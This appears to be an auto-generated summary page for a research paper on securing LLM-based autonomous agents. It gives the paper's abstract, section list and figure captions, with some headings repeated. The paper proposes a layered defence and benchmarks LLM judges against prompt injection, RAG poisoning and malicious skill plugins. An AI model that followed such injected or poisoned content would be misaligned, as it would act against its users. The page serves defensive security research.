Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

Yuxu Ge

Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

Yuxu Ge

TL;DR

The Layered Governance Architecture (LGA), a four-layer framework comprising execution sandboxing, intent verification, zero-trust inter-agent authorization, and immutable audit logging, is proposed and generalization to the external InjecAgent benchmark yields 99-100% interception, confirming robustness beyond the authors' synthetic data.

Abstract

Autonomous agents powered by large language models introduce a class of execution-layer vulnerabilities -- prompt injection, retrieval poisoning, and uncontrolled tool invocation -- that existing guardrails fail to address systematically. In this work, we propose the Layered Governance Architecture (LGA), a four-layer framework comprising execution sandboxing (L1), intent verification (L2), zero-trust inter-agent authorization (L3), and immutable audit logging (L4). To evaluate LGA, we construct a bilingual benchmark (Chinese original, English via machine translation) of 1,081 tool-call samples -- covering prompt injection, RAG poisoning, and malicious skill plugins -- and apply it to OpenClaw, a representative open-source agent framework. Experimental results on Layer 2 intent verification with four local LLM judges (Qwen3.5-4B, Llama-3.1-8B, Qwen3.5-9B, Qwen2.5-14B) and one cloud judge (GPT-4o-mini) show that all five LLM judges intercept 93.0-98.5% of TC1/TC2 malicious tool calls, while lightweight NLI baselines remain below 10%. TC3 (malicious skill plugins) proves harder at 75-94% IR among judges with meaningful precision-recall balance, motivating complementary enforcement at Layers 1 and 3. Qwen2.5-14B achieves the best local balance (98% IR, approximately 10-20% FPR); a two-stage cascade (Qwen3.5-9B->GPT-4o-mini) achieves 91.9-92.6% IR with 1.9-6.7% FPR; a fully local cascade (Qwen3.5-9B->Qwen2.5-14B) achieves 94.7-95.6% IR with 6.0-9.7% FPR for data-sovereign deployments. An end-to-end pipeline evaluation (n=100) demonstrates that all four layers operate in concert with 96% IR and a total P50 latency of approximately 980 ms, of which the non-judge layers contribute only approximately 18 ms. Generalization to the external InjecAgent benchmark yields 99-100% interception, confirming robustness beyond our synthetic data.

Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

TL;DR

Abstract

Paper Structure (47 sections, 2 equations, 2 figures, 10 tables)

This paper contains 47 sections, 2 equations, 2 figures, 10 tables.

Introduction
Related Work
LLM Code Generation and Abstraction Failures
Prompt Injection and Agent Security
Agent Frameworks
Agent Security Benchmarks
LLM Safety and Guardrail Systems
From Defect Remediation to System Governance
Threat Model for Multi-Agent Systems
System Model
Attacker Model.
Threat Class 1: Agency Abuse via Prompt Injection
Threat Class 2: RAG Data Poisoning
Threat Class 3: Malicious Skill Plugins
Layered Governance Architecture (LGA)
...and 32 more sections

Figures (2)

Figure 1: Layered Governance Architecture (LGA). Arrows indicate the verification and authorization flow; each layer is independently deployable.
Figure 2: Interception rate by attack subtype (TC1/TC2 only) on the Chinese dataset. On this dataset, all LLM judges achieve ${\geq}$92% across all attack types, while BART-MNLI remains below 18% (some English values fall slightly below 92%; see Table \ref{['tab:security']}). Baseline (0%) and mDeBERTa-NLI (0%) omitted for clarity.

Theorems & Definitions (3)

Definition 4.1: Prompt Injection Attack
Definition 4.2: RAG Poisoning Attack
Definition 4.3: Malicious Skill Plugin Attack

Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

TL;DR

Abstract

Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

Authors

TL;DR

Abstract

Table of Contents

Figures (2)

Theorems & Definitions (3)